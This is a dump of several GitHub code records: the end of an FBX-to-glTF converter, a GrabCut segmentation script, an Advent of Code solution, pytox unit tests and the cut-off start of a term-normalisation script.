lSkinIdx\n\n for i in range(pNode.GetNodeAttributeCount()):\n lNodeAttribute = pNode.GetNodeAttributeByIndex(i)\n if lNodeAttribute.GetAttributeType() == FbxNodeAttribute.eMesh:\n lPrimitive = ConvertMesh(pScene, lNodeAttribute, pNode, lGLTFSkin, lClusters)\n if not lPrimitive == None:\n if (not \"primitives\" in lGLTFMesh):\n lGLTFMesh[\"primitives\"] = []\n lGLTFMesh[\"primitives\"].append(lPrimitive)\n\n if \"primitives\" in lGLTFMesh:\n lMeshIdx = len(lib_meshes)\n lib_meshes.append(lGLTFMesh)\n lGLTFNode['mesh'] = lMeshIdx\n\n if lHasSkin:\n lClusterGlobalInitMatrix = FbxAMatrix()\n lReferenceGlobalInitMatrix = FbxAMatrix()\n\n lIBM = []\n for i in range(len(lGLTFSkin['joints'])):\n lJointIdx = lGLTFSkin['joints'][i]\n lCluster = lClusters[lJointIdx]\n\n # Inverse Bind Pose Matrix\n # Matrix of Mesh\n lCluster.GetTransformMatrix(lReferenceGlobalInitMatrix)\n # Matrix of Joint\n lCluster.GetTransformLinkMatrix(lClusterGlobalInitMatrix)\n # http://blog.csdn.net/bugrunner/article/details/7232291\n # http://help.autodesk.com/view/FBX/2017/ENU/?guid=__cpp_ref__view_scene_2_draw_scene_8cxx_example_html\n m = lClusterGlobalInitMatrix.Inverse() * lReferenceGlobalInitMatrix\n lIBM.append(m)\n\n lGLTFSkin['inverseBindMatrices'] = CreateIBMBuffer(lIBM)\n\n else:\n # Camera and light node attribute\n lNodeAttribute = pNode.GetNodeAttribute()\n if not lNodeAttribute == None:\n lAttributeType = lNodeAttribute.GetAttributeType()\n if lAttributeType == FbxNodeAttribute.eCamera:\n lCameraKey = ConvertCamera(lNodeAttribute)\n lGLTFNode['camera'] = lCameraKey\n\n if pNode.GetChildCount() > 0:\n lGLTFNode['children'] = []\n for i in range(pNode.GetChildCount()):\n lChildNodeIdx = ConvertSceneNode(pScene, pNode.GetChild(i), pPoseTime)\n lGLTFNode['children'].append(lChildNodeIdx)\n\n return GetNodeIdx(pNode)\n\ndef ConvertScene(pScene, pPoseTime):\n lRoot = pScene.GetRootNode()\n\n lGLTFScene = {'nodes' : []}\n\n lSceneIdx = len(lib_scenes)\n lib_scenes.append(lGLTFScene)\n\n for i in range(lRoot.GetChildCount()):\n lNodeIdx = 
ConvertSceneNode(pScene, lRoot.GetChild(i), pPoseTime)\n lGLTFScene['nodes'].append(lNodeIdx)\n\n return lSceneIdx\n\ndef CreateAnimation(pName):\n lAnimIdx = len(lib_animations)\n lGLTFAnimation = {\n 'name': pName,\n 'channels' : [],\n 'samplers' : []\n }\n\n return lAnimIdx, lGLTFAnimation\n\n_samplerChannels = ['rotation', 'scale', 'translation']\n_timeSamplerHashMap = {}\n\ndef GetPropertyAnimationCurveTime(pAnimCurve):\n lTimeSpan = FbxTimeSpan()\n pAnimCurve.GetTimeInterval(lTimeSpan)\n lStartTimeDouble = lTimeSpan.GetStart().GetSecondDouble()\n lEndTimeDouble = lTimeSpan.GetStop().GetSecondDouble()\n lDuration = lEndTimeDouble - lStartTimeDouble\n\n return lStartTimeDouble, lEndTimeDouble, lDuration\n\nEPSILON = 1e-6\ndef V3Same(a, b):\n return abs(a[0] - b[0]) < EPSILON and abs(a[1] - b[1]) < EPSILON and abs(a[2] - b[2]) < EPSILON\ndef V4Same(a, b):\n return abs(a[0] - b[0]) < EPSILON and abs(a[1] - b[1]) < EPSILON and abs(a[2] - b[2]) < EPSILON and abs(a[3] - b[3]) < EPSILON\ndef V3Middle(a, b):\n return [(a[0] + b[0]) / 2, (a[1] + b[1]) / 2, (a[2] + b[2]) / 2]\ndef QuatSlerp(a, b, t):\n [ax, ay, az, aw] = a\n [bx, by, bz, bw] = b\n ## calc cosine\n cosom = ax * bx + ay * by + az * bz + aw * bw\n ## adjust signs (if necessary)\n if cosom < 0.0:\n cosom = -cosom\n bx = -bx\n by = -by\n bz = -bz\n bw = -bw\n\n ## calculate coefficients\n if 1.0 - cosom > 0.000001:\n ## standard case (slerp)\n omega = math.acos(cosom)\n sinom = math.sin(omega)\n scale0 = math.sin((1.0 - t) * omega) / sinom\n scale1 = math.sin(t * omega) / sinom\n else:\n ## \"from\" and \"to\" quaternions are very close\n ## ... so we can do a linear interpolation\n scale0 = 1.0 - t\n scale1 = t\n ## calculate final values\n return [scale0 * ax + scale1 * bx, scale0 * ay + scale1 * by, scale0 * az + scale1 * bz, scale0 * aw + scale1 * bw]\n\ndef FitLinearInterpolation(pTime, pTranslationChannel, pRotationChannel, pScaleChannel):\n lTranslationChannel = []\n lRotationChannel = []\n lScaleChannel = []\n lTime = []\n lHaveRotation = len(pRotationChannel) > 0\n lHaveScale = len(pScaleChannel) > 0\n lHaveTranslation = len(pTranslationChannel) > 0\n if lHaveRotation:\n lRotationChannel.append(pRotationChannel[0])\n if lHaveScale:\n lScaleChannel.append(pScaleChannel[0])\n if lHaveTranslation:\n lTranslationChannel.append(pTranslationChannel[0])\n lTime.append(pTime[0])\n for i in range(len(pTime)):\n lLinearInterpolated = True\n if i > 1:\n if lHaveTranslation:\n if not V3Same(V3Middle(pTranslationChannel[i - 2], pTranslationChannel[i]), pTranslationChannel[i - 1]):\n lLinearInterpolated = False\n if lHaveScale and lLinearInterpolated:\n if not V3Same(V3Middle(pScaleChannel[i - 2], pScaleChannel[i]), pScaleChannel[i - 1]):\n lLinearInterpolated = False\n if lHaveRotation:\n if not V4Same(QuatSlerp(pRotationChannel[i - 2], pRotationChannel[i], 0.5), pRotationChannel[i - 1]):\n lLinearInterpolated = False\n\n if not lLinearInterpolated:\n if lHaveTranslation:\n lTranslationChannel.append(pTranslationChannel[i - 1])\n if lHaveRotation:\n lRotationChannel.append(pRotationChannel[i - 1])\n if lHaveScale:\n lScaleChannel.append(pScaleChannel[i - 1])\n lTime.append(pTime[i - 1])\n\n if len(pTime) > 1:\n if lHaveRotation:\n lRotationChannel.append(pRotationChannel[len(pRotationChannel) - 1])\n if lHaveScale:\n lScaleChannel.append(pScaleChannel[len(pScaleChannel) - 1])\n if lHaveTranslation:\n lTranslationChannel.append(pTranslationChannel[len(pTranslationChannel) - 1])\n\n lTime.append(pTime[len(pTime) - 1])\n\n return lTime, 
lTranslationChannel, lRotationChannel, lScaleChannel\n\n\ndef ConvertNodeAnimation(pGLTFAnimation, pAnimLayer, pNode, pSampleRate, pStartTime, pDuration):\n lNodeIdx = GetNodeIdx(pNode)\n\n curves = [\n pNode.LclTranslation.GetCurve(pAnimLayer, 'X'),\n pNode.LclTranslation.GetCurve(pAnimLayer, 'Y'),\n pNode.LclTranslation.GetCurve(pAnimLayer, 'Z'),\n\n pNode.LclRotation.GetCurve(pAnimLayer, 'X'),\n pNode.LclRotation.GetCurve(pAnimLayer, 'Y'),\n pNode.LclRotation.GetCurve(pAnimLayer, 'Z'),\n\n pNode.LclScaling.GetCurve(pAnimLayer, 'X'),\n pNode.LclScaling.GetCurve(pAnimLayer, 'Y'),\n pNode.LclScaling.GetCurve(pAnimLayer, 'Z'),\n ]\n\n lHaveTranslation = any(curves[0:3])\n lHaveRotation = any(curves[3:6])\n lHaveScaling = any(curves[6:9])\n\n # Curve time span may much smaller than stack local time span\n # It can reduce a lot of space\n # PENDING\n lStartTimeDouble = 1000000\n lDuration = 0\n lEndTimeDouble = 0\n for curve in curves:\n if not curve == None:\n lCurveStart, lCurveEnd, lCurveDuration = GetPropertyAnimationCurveTime(curve)\n lStartTimeDouble = min(lCurveStart, lStartTimeDouble)\n lEndTimeDouble = max(lCurveEnd, lEndTimeDouble)\n lDuration = max(lCurveDuration, lDuration)\n\n lDuration = min(lDuration, pDuration)\n lStartTimeDouble = max(lStartTimeDouble, pStartTime)\n\n if lDuration > 0:\n lNumFrames = math.ceil(lDuration / pSampleRate)\n\n lTime = FbxTime()\n\n lTimeChannel = []\n lTranslationChannel = []\n lRotationChannel = []\n lScaleChannel = []\n\n lQuaternion = FbxQuaternion()\n for i in range(lNumFrames):\n lSecondDouble = min(lStartTimeDouble + pSampleRate * i, lEndTimeDouble)\n lTime.SetSecondDouble(lSecondDouble)\n\n lTransform = pNode.EvaluateLocalTransform(lTime, FbxNode.eDestinationPivot)\n lTranslation = lTransform.GetT()\n lQuaternion = lTransform.GetQ()\n lScale = lTransform.GetS()\n\n #Convert quaternion to axis angle\n lTimeChannel.append(lSecondDouble)\n\n if lHaveRotation:\n lRotationChannel.append(list(lQuaternion))\n if lHaveTranslation:\n lTranslationChannel.append(list(lTranslation))\n if lHaveScaling:\n lScaleChannel.append(list(lScale))\n\n lTimeChannel, lTranslationChannel, lRotationChannel, lScaleChannel = FitLinearInterpolation(\n lTimeChannel, lTranslationChannel, lRotationChannel, lScaleChannel\n )\n\n # TODO Performance?\n lTimeAccessorKey = tuple(lTimeChannel)\n if not lTimeAccessorKey in _timeSamplerHashMap:\n # TODO use ubyte.\n _timeSamplerHashMap[lTimeAccessorKey] = CreateAnimationBuffer(lTimeChannel, 'f', 1)\n\n lSamplerAccessors = {\n \"time\": _timeSamplerHashMap[lTimeAccessorKey]\n # \"time\": CreateAnimationBuffer(lTimeChannel, 'f', 1)\n }\n if lHaveTranslation:\n lAccessorIdx = CreateAnimationBuffer(lTranslationChannel, 'f', 3)\n if lAccessorIdx >= 0:\n lSamplerAccessors['translation'] = lAccessorIdx\n if lHaveRotation:\n lAccessorIdx = CreateAnimationBuffer(lRotationChannel, 'f', 4)\n if lAccessorIdx >= 0:\n lSamplerAccessors['rotation'] = lAccessorIdx\n if lHaveScaling:\n lAccessorIdx = CreateAnimationBuffer(lScaleChannel, 'f', 3)\n if lAccessorIdx >= 0:\n lSamplerAccessors['scale'] = lAccessorIdx\n\n #TODO Other interpolation methods\n for path in _samplerChannels:\n if path in lSamplerAccessors:\n lSamplerIdx = len(pGLTFAnimation['samplers'])\n pGLTFAnimation['samplers'].append({\n \"input\": lSamplerAccessors['time'],\n \"interpolation\": \"LINEAR\",\n \"output\": lSamplerAccessors[path]\n })\n pGLTFAnimation['channels'].append({\n \"sampler\" : lSamplerIdx,\n \"target\" : {\n \"node\": lNodeIdx,\n \"path\" : path\n }\n })\n\n 
for i in range(pNode.GetChildCount()):\n ConvertNodeAnimation(pGLTFAnimation, pAnimLayer, pNode.GetChild(i), pSampleRate, pStartTime, pDuration)\n\ndef ConvertAnimation(pScene, pSampleRate, pStartTime, pDuration):\n lRoot = pScene.GetRootNode()\n for i in range(pScene.GetSrcObjectCount(FbxCriteria.ObjectType(FbxAnimStack.ClassId))):\n lAnimStack = pScene.GetSrcObject(FbxCriteria.ObjectType(FbxAnimStack.ClassId), i)\n lAnimIdx, lGLTFAnimation = CreateAnimation(lAnimStack.GetName())\n for j in range(lAnimStack.GetSrcObjectCount(FbxCriteria.ObjectType(FbxAnimLayer.ClassId))):\n lAnimLayer = lAnimStack.GetSrcObject(FbxCriteria.ObjectType(FbxAnimLayer.ClassId), j)\n # for k in range(lRoot.GetChildCount()):\n ConvertNodeAnimation(lGLTFAnimation, lAnimLayer, lRoot, pSampleRate, pStartTime, pDuration)\n if len(lGLTFAnimation['samplers']) > 0:\n lib_animations.append(lGLTFAnimation)\n# def ConvertAnimation2(pScene, pStartTime, pDuration):\n# for i in range(pScene.GetSrcObjectCount(FbxCriteria.ObjectType(FbxAnimStack.ClassId))):\n# lAnimStack = pScene.GetSrcObject(FbxCriteria.ObjectType(FbxAnimStack.ClassId), i)\n# lAnimName = lAnimStack.GetName()\n\n# lTakeInfo = pScene.GetTakeInfo(lAnimName)\n\n\ndef CreateBufferView(pBufferIdx, pBuffer, appendBufferData, lib, pByteOffset, target=GL_ARRAY_BUFFER):\n if pByteOffset % 4 == 2:\n pBuffer.extend(b'\\x00\\x00')\n pByteOffset += 2\n\n pBuffer.extend(appendBufferData)\n lBufferViewIdx = len(lib_buffer_views)\n lBufferView = {\n \"buffer\": pBufferIdx,\n \"byteLength\": len(appendBufferData),\n \"byteOffset\": pByteOffset,\n # PENDING\n # \"byteStride\": 0,\n \"target\": target\n }\n lib_buffer_views.append(lBufferView)\n for lAttrib in lib:\n lAttrib['bufferView'] = lBufferViewIdx\n\n return lBufferView\n\n\ndef CreateBufferViews(pBufferIdx, pBin):\n\n lByteOffset = CreateBufferView(pBufferIdx, pBin, attributeBuffer, lib_attributes_accessors, 0)['byteLength']\n\n if len(lib_ibm_accessors) > 0:\n lByteOffset += CreateBufferView(pBufferIdx, pBin, invBindMatricesBuffer, lib_ibm_accessors, lByteOffset)['byteLength']\n\n if len(lib_animation_accessors) > 0:\n lByteOffset += CreateBufferView(pBufferIdx, pBin, animationBuffer, lib_animation_accessors, lByteOffset)['byteLength']\n\n #When creating a Float32Array, which the offset must be multiple of 4\n CreateBufferView(pBufferIdx, pBin, indicesBuffer, lib_indices_accessors, lByteOffset, GL_ELEMENT_ARRAY_BUFFER)\n\n\n# Start from -1 and ignore the root node\n_nodeCount = -1\n_nodeIdxMap = {}\ndef PrepareSceneNode(pNode, fbxConverter):\n global _nodeCount\n _nodeIdxMap[pNode.GetUniqueID()] = _nodeCount\n _nodeCount = _nodeCount + 1\n\n for k in range(pNode.GetChildCount()):\n PrepareSceneNode(pNode.GetChild(k), fbxConverter)\n\n# Each node can have two pivot context. 
The node's animation data can be converted from one pivot context to the other\n# Convert source pivot to destination with all zero pivot.\n# http://docs.autodesk.com/FBX/2013/ENU/FBX-SDK-Documentation/index.html?url=cpp_ref/class_fbx_node.html,topicNumber=cpp_ref_class_fbx_node_html\ndef PrepareBakeTransform(pNode):\n # http://help.autodesk.com/view/FBX/2017/ENU/?guid=__files_GUID_C35D98CB_5148_4B46_82D1_51077D8970EE_htm\n pNode.SetPivotState(FbxNode.eSourcePivot, FbxNode.ePivotActive)\n pNode.SetPivotState(FbxNode.eDestinationPivot, FbxNode.ePivotActive)\n\n lZero = FbxVector4(0, 0, 0)\n pNode.SetPostRotation(FbxNode.eDestinationPivot, lZero);\n pNode.SetPreRotation(FbxNode.eDestinationPivot, lZero);\n pNode.SetRotationOffset(FbxNode.eDestinationPivot, lZero);\n pNode.SetScalingOffset(FbxNode.eDestinationPivot, lZero);\n pNode.SetRotationPivot(FbxNode.eDestinationPivot, lZero);\n pNode.SetScalingPivot(FbxNode.eDestinationPivot, lZero);\n\n pNode.SetGeometricTranslation(FbxNode.eDestinationPivot, lZero);\n pNode.SetGeometricRotation(FbxNode.eDestinationPivot, lZero);\n pNode.SetGeometricScaling(FbxNode.eDestinationPivot, FbxVector4(1, 1, 1));\n # pNode.SetUseQuaternionForInterpolation(FbxNode.eDestinationPivot, pNode.GetUseQuaternionForInterpolation(FbxNode.eSourcePivot));\n\n for k in range(pNode.GetChildCount()):\n PrepareBakeTransform(pNode.GetChild(k))\n\n\ndef GetNodeIdx(pNode):\n lId = pNode.GetUniqueID()\n if not lId in _nodeIdxMap:\n return -1\n return _nodeIdxMap[lId]\n\n# FIXME\n# http://help.autodesk.com/view/FBX/2017/ENU/?guid=__cpp_ref_fbxtime_8h_html\nTIME_INFINITY = FbxTime(0x7fffffffffffffff)\n\ndef Convert(\n filePath,\n ouptutFile = '',\n excluded = [],\n animFrameRate = 1 / 20,\n startTime = 0,\n duration = 1000,\n poseTime = TIME_INFINITY,\n beautify = False\n):\n ignoreScene = 'scene' in excluded\n ignoreAnimation = 'animation' in excluded\n # Prepare the FBX SDK.\n lSdkManager, lScene = InitializeSdkObjects()\n fbxConverter = FbxGeometryConverter(lSdkManager)\n # Load the scene.\n lResult = LoadScene(lSdkManager, lScene, filePath)\n\n if not lResult:\n print(\"\\n\\nAn error occurred while loading the scene...\")\n else:\n lBasename, lExt = os.path.splitext(ouptutFile)\n\n # Do it before SplitMeshesPerMaterial or the vertices of split mesh will be wrong.\n PrepareBakeTransform(lScene.GetRootNode())\n lScene.GetRootNode().ConvertPivotAnimationRecursive(None, FbxNode.eDestinationPivot, 60)\n\n # PENDING Triangulate before SplitMeshesPerMaterial or it will not work.\n fbxConverter.Triangulate(lScene, True)\n\n # TODO SplitMeshPerMaterial may loss deformer in mesh\n # TODO It will be crashed in some fbx files\n # FBX version 2014.2 seems have fixed it\n fbxConverter.SplitMeshesPerMaterial(lScene, True)\n\n PrepareSceneNode(lScene.GetRootNode(), fbxConverter)\n\n if not ignoreScene:\n lSceneIdx = ConvertScene(lScene, poseTime)\n if not ignoreAnimation:\n ConvertAnimation(lScene, animFrameRate, startTime, duration)\n\n #Merge binary data and write to a binary file\n lBin = bytearray()\n\n CreateBufferViews(0, lBin)\n\n lBufferName = lBasename + '.bin'\n lib_buffers.append({'byteLength' : len(lBin), 'uri' : os.path.basename(lBufferName)})\n\n out = open(lBasename + \".bin\", 'wb')\n out.write(lBin)\n out.close()\n\n #Output json\n lOutput = {\n 'asset': {\n 'generator': 'qtek fbx2gltf',\n 'version': '2.0'\n },\n 'accessors' : lib_accessors,\n 'bufferViews' : lib_buffer_views,\n 'buffers' : lib_buffers,\n 'nodes' : lib_nodes,\n 'scenes' : lib_scenes,\n 'meshes' : 
lib_meshes,\n }\n if len(lib_cameras) > 0:\n lOutput['cameras'] = lib_cameras\n if len(lib_skins) > 0:\n lOutput['skins'] = lib_skins\n if len(lib_materials) > 0:\n lOutput['materials'] = lib_materials\n if len(lib_images) > 0:\n lOutput['images'] = lib_images\n if len(lib_samplers) > 0:\n lOutput['samplers'] = lib_samplers\n if len(lib_textures) > 0:\n lOutput['textures'] = lib_textures\n if len(lib_animations) > 0:\n lOutput['animations'] = lib_animations\n #Default scene\n if not ignoreScene:\n lOutput['scene'] = lSceneIdx\n\n out = open(ouptutFile, 'w')\n indent = None\n seperator = ':'\n\n if beautify:\n indent = 2\n seperator = ': '\n out.write(json.dumps(lOutput, indent = indent, sort_keys = True, separators=(',', seperator)))\n out.close()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='FBX to glTF converter', add_help=True)\n parser.add_argument('-e', '--exclude', type=str, default='', help=\"Data excluded. Can be: scene,animation\")\n parser.add_argument('-t', '--timerange', default='0,1000', type=str, help=\"Export animation time, in format 'startSecond,endSecond'\")\n parser.add_argument('-o', '--output', default='', type=str, help=\"Ouput glTF file path\")\n parser.add_argument('-f', '--framerate', default=20, type=float, help=\"Animation frame per second\")\n parser.add_argument('-p', '--pose', default=0, type=float, help=\"Start pose time\")\n parser.add_argument('-q', '--quantize', action='store_true', help=\"Quantize accessors with WEB3D_quantized_attributes extension\")\n parser.add_argument('-b', '--beautify', action=\"store_true\", help=\"Beautify json output.\")\n\n parser.add_argument('--noflipv', action=\"store_true\", help=\"If not flip v in texcoord.\")\n parser.add_argument('file')\n\n args = parser.parse_args()\n\n lStartTime = 0\n lDuration = 1000\n lTimeRange = args.timerange.split(',')\n if lTimeRange[0]:\n lStartTime = float(lTimeRange[0])\n if lTimeRange[1]:\n lDuration = float(lTimeRange[1])\n\n if not args.output:\n lBasename, lExt = os.path.splitext(args.file)\n args.output = lBasename + '.gltf'\n\n # PENDING Not use INFINITY poseTime or some joint transform without animation maybe not right.\n lPoseTime = FbxTime()\n lPoseTime.SetSecondDouble(float(args.pose))\n\n excluded = args.exclude.split(',')\n\n ENV_QUANTIZE = args.quantize\n ENV_FLIP_V = not args.noflipv\n\n Convert(\n args.file,\n args.output,\n excluded,\n 1 / args.framerate,\n lStartTime,\n lDuration,\n lPoseTime,\n args.beautify\n )","repo_name":"jing-ge/myecharts","sub_path":"node_modules/echarts-gl/node_modules/qtek/tools/fbx2gltf.py","file_name":"fbx2gltf.py","file_ext":"py","file_size_in_byte":50151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"9934956615","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef calculate_metrics(ground_truth_mask, segmented_mask):\n intersection = np.logical_and(ground_truth_mask, segmented_mask)\n union = np.logical_or(ground_truth_mask, segmented_mask)\n iou = np.sum(intersection) / np.sum(union)\n pixel_accuracy = np.mean(ground_truth_mask == segmented_mask) * 100\n interweak=np.sum(intersection)\n uniweak=np.sum(union)\n print(interweak)\n print(uniweak)\n return iou, pixel_accuracy\n\ndef segment_image(image_path, ground_truth_mask_path):\n # Load the image\n image = cv2.imread(image_path)\n\n # Load the ground truth mask\n ground_truth_mask = cv2.imread(ground_truth_mask_path, 0)\n\n # Create a mask to initialize the GrabCut 
algorithm\n mask = np.zeros(image.shape[:2], dtype=np.uint8)\n\n # Define the region of interest (ROI) using the ground truth mask\n rect = cv2.boundingRect(ground_truth_mask)\n\n # Apply GrabCut algorithm to refine the segmentation\n cv2.grabCut(image, mask, rect, None, None, 5, cv2.GC_INIT_WITH_RECT)\n\n # Create a binary mask where sure foreground and probable foreground are marked as 1\n segmented_mask = np.where((mask == cv2.GC_FGD) | (mask == cv2.GC_PR_FGD), 1, 0).astype(np.uint8)\n\n # Calculate IOU and pixel accuracy\n iou, pixel_accuracy = calculate_metrics(ground_truth_mask, segmented_mask)\n\n # Display the original image, ground truth mask, and segmented mask using Matplotlib\n fig, axes = plt.subplots(1, 3, figsize=(12, 4))\n\n axes[0].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n axes[0].set_title(\"Original Image\")\n axes[0].axis(\"off\")\n\n axes[1].imshow(ground_truth_mask, cmap=\"gray\")\n axes[1].set_title(\"Ground Truth Mask\")\n axes[1].axis(\"off\")\n\n axes[2].imshow(segmented_mask, cmap=\"gray\")\n axes[2].set_title(\"Segmented Mask\")\n axes[2].axis(\"off\")\n\n plt.tight_layout()\n plt.show()\n\n print(\"IOU: {:.2f}\".format(iou))\n print(\"Pixel Accuracy: {:.2f}%\".format(pixel_accuracy))\n\n# Provide the path to your image\nimage_path = \"bird.jpg\"\n\n# Provide the path to your ground truth mask\nground_truth_mask_path = \"bird_ground_truth_mask.jpg\"\n\n# Call the segmentation function\nsegment_image(image_path, ground_truth_mask_path)\n","repo_name":"varun123H/Major-Project","sub_path":"weak.py","file_name":"weak.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73019523976","text":"#!/usr/bin/env python\n\nreadings = [int(row) for row in open('1.input').readlines()]\n\nincrements = 0\nwin_size = 3\nlast = sum(readings[0:win_size])\n\nfor i in range(1, len(readings)):\n win_sum = sum(readings[i:i + win_size])\n if win_sum > last:\n increments += 1\n last = win_sum\n\nprint(increments)\n","repo_name":"creideiki/adventofcode2021","sub_path":"1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30825109194","text":"import unittest\n\nfrom pytox import core\n\n\nclass CoreTest(unittest.TestCase):\n def test_version(self):\n self.assertEqual(len(core.VERSION.split(\".\")), 3)\n\n def test_options(self):\n opts = core.ToxOptions()\n self.assertTrue(opts.ipv6_enabled)\n opts.ipv6_enabled = False\n self.assertFalse(opts.ipv6_enabled)\n\n def test_use_after_free(self):\n opts = core.ToxOptions()\n with self.assertRaises(core.UseAfterFreeException):\n with core.Core(opts) as tox:\n saved_tox = tox\n print(saved_tox.address)\n\n def test_address(self):\n opts = core.ToxOptions()\n with core.Core(opts) as tox:\n self.assertEqual(tox.address, tox.address)\n\n def test_public_key_is_address_prefix(self):\n opts = core.ToxOptions()\n with core.Core(opts) as tox:\n self.assertEqual(\n tox.public_key.hex()[:72] + format(tox.nospam, \"08x\"),\n tox.address[:36].hex(),\n )\n\n def test_public_key_is_not_secret_key(self):\n opts = core.ToxOptions()\n with core.Core(opts) as tox:\n self.assertNotEqual(tox.public_key, tox.secret_key)\n\n def test_savedata_contains_secret_key(self):\n with core.Core() as tox:\n self.assertIn(tox.secret_key, tox.savedata)\n\n def test_set_name(self):\n with core.Core() as tox:\n self.assertEqual(tox.name, b\"\")\n 
tox.name = b\"iphy\"\n self.assertEqual(tox.name, b\"iphy\")\n\n tox.name = b\"x\" * core.MAX_NAME_LENGTH\n with self.assertRaises(core.ApiException):\n tox.name = b\"x\" * (core.MAX_NAME_LENGTH + 1)\n\n def test_set_status_message(self):\n with core.Core() as tox:\n self.assertEqual(tox.status_message, b\"\")\n tox.status_message = b\"pytox is cool now\"\n self.assertEqual(tox.status_message, b\"pytox is cool now\")\n\n tox.status_message = b\"x\" * core.MAX_STATUS_MESSAGE_LENGTH\n with self.assertRaises(core.ApiException):\n tox.status_message = b\"x\" * (core.MAX_STATUS_MESSAGE_LENGTH +\n 1)\n\n def test_set_status(self):\n with core.Core() as tox:\n self.assertEqual(tox.status, core.TOX_USER_STATUS_NONE)\n tox.status = core.TOX_USER_STATUS_AWAY\n self.assertEqual(tox.status, core.TOX_USER_STATUS_AWAY)\n tox.status = 50 # setting it to an invalid value has no effect\n self.assertEqual(tox.status, core.TOX_USER_STATUS_AWAY)\n\n def test_friend_add(self):\n with core.Core() as tox1:\n with core.Core() as tox2:\n tox1.friend_add(tox2.address, b\"hello there!\")\n tox2.friend_add_norequest(tox1.public_key)\n with self.assertRaises(core.LengthException):\n tox2.friend_add_norequest(tox1.address)\n with self.assertRaises(core.LengthException):\n tox2.friend_add(tox1.public_key, b\"oh no!\")\n\n def test_friend_delete(self):\n with core.Core() as tox1:\n with core.Core() as tox2:\n tox1.friend_add(tox2.address, b\"hello there!\")\n tox1.friend_delete(0)\n with self.assertRaises(core.ApiException):\n # Deleting again: we don't have that friend anymore.\n tox1.friend_delete(0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"TokTok/py-toxcore-c","sub_path":"test/core_test.py","file_name":"core_test.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"45"} +{"seq_id":"72064722377","text":"from collections import Counter\nfrom collections import defaultdict\nimport os,sys\nimport re, regex\nimport csv\nimport itertools\nimport functools\nimport operator\nfrom copy import deepcopy as copy\nimport sqlite3\nimport numpy as np\nfrom scipy.sparse import csr_matrix as csr\nfrom scipy.sparse.csgraph import connected_components\nimport multiprocessing as MP\nimport time\nimport fasttext\n\n_termfile = sys.argv[1];\n_outfile = sys.argv[2];\n\n_model = 'resources/lid.176.bin';\n\n_threshold_prefix = 0.75#0.8; #TODO: These thresholds might be different for each typ\n_window_prefix = 1;\n_threshold_similar = 0.8#.875; #TODO: Try out what are the best ones for each type!\n_window_similar = 20;\n_distance = 'damerau'; #'edit'\n_and_p_ = 0.0005#0.5#0.6;\n_and_c_ = 0.000000001#0.0001;\n_or_p_ = 0.0003#0.3#0.4;\n_or_c_ = 0.000000001#0.0001;\n\nCNT = 0; TRE = 1; PRO = 2;\n\nWORD = re.compile(r'(\\b[^\\s]+\\b)');\nCHAR = re.compile(r'([A-Za-z]|ß|ö|ü|ä)+');\nLEGAL = regex.compile(r'\\p{L}+')\n\ndef ngrams(seq,n):\n return [tuple(seq[i-n:i]) for i in range(n,len(seq)+1) ];\n\ndef probs_leq(p,c,tree):\n return [(w,w_) for w in tree for w_ in tree[w][TRE] if tree[w][TRE][w_][PRO]>=p and tree[w][PRO]>=c];\n\ndef make_tree(d):\n tree = dict();\n for ngram in d:\n if len(ngram) == 2:\n if ngram[0] in tree:\n tree[ngram[0]][CNT] += d[ngram];\n if ngram[1] in tree[ngram[0]][TRE]:\n tree[ngram[0]][TRE][ngram[1]][CNT] += d[ngram];\n else:\n tree[ngram[0]][TRE][ngram[1]] = [d[ngram],dict(),0];\n else:\n tree[ngram[0]] = [d[ngram],{ngram[1]:[d[ngram],dict(),0]},0];\n divisor = float(sum([tree[w][CNT] for w in tree]));\n for 
w in tree:\n tree[w][PRO] = tree[w][CNT] / divisor;\n for w_ in tree[w][TRE]:\n tree[w][TRE][w_][PRO] = float(tree[w][TRE][w_][CNT]) / tree[w][CNT];\n return tree;\n\ndef combine_counters(counters):\n c = Counter();\n i = 0;\n for counter in counters:\n i += 1;\n if i % 50 == 0:\n print(i);\n for term in counter:\n c[term] += counter[term];\n return c;\n\ndef display(p,c,tree,inversed=False):\n if inversed:\n for w,w_ in probs_leq(p,c,tree):\n print('(inv)', w_,w, tree[w][CNT], tree[w][TRE][w_][CNT], tree[w][TRE][w_][PRO]);\n else:\n for w,w_ in probs_leq(p,c,tree):\n print('(std)', w,w_, tree[w][CNT], tree[w][TRE][w_][CNT], tree[w][TRE][w_][PRO]);\n\ndef transitive_closure(M): # WARNING: Not for large M!\n labels = connected_components(M)[1];\n closure = csr(labels==labels[:,None]);\n return closure;\n\ndef apply_replace(index2term,replacements):\n if len(replacements) == 0:\n return dict();\n term2index = {index2term[i]:i for i in range(len(index2term))};\n rows,cols,sims = zip(*replacements);\n R = csr((np.ones(2*len(rows)),(rows+cols,cols+rows)),dtype=bool,shape=(len(index2term),len(index2term)));\n labels = connected_components(R)[1];\n sorting = np.argsort(labels);\n labels_s = labels[sorting];\n _, starts = np.unique(labels_s,return_index=True);\n sizes = np.diff(starts);\n groups = [group for group in np.split(sorting,starts[1:]) if group.size > 1];\n replace = dict();\n for group in groups:\n terms = [index2term[i] for i in group];\n repre = max([(d[(term,)],term) for term in terms])[1];\n for term in terms:\n if term != repre:\n replace[term] = repre;\n return replace;\n\ndef replace_by_prefix(index2term,threshold,window):\n replacements = set([]);\n for i in range(len(index2term)-window):\n len_1 = len(index2term[i]);\n for j in range(1,window+1):\n len_2 = len(index2term[i+j]);\n percent = prefix_normed(index2term[i],index2term[i+j],len_1,len_2);\n if percent > threshold:\n replacements.add((i+j,i,percent,));\n return replacements;\n\ndef replace_by_similar(index2term,threshold,window,DIST,compared):\n replacements = set([]);\n manager = MP.Manager();\n tasks = manager.Queue();\n results = manager.Queue();\n T = [];\n for i in range(len(index2term)-window):\n T += 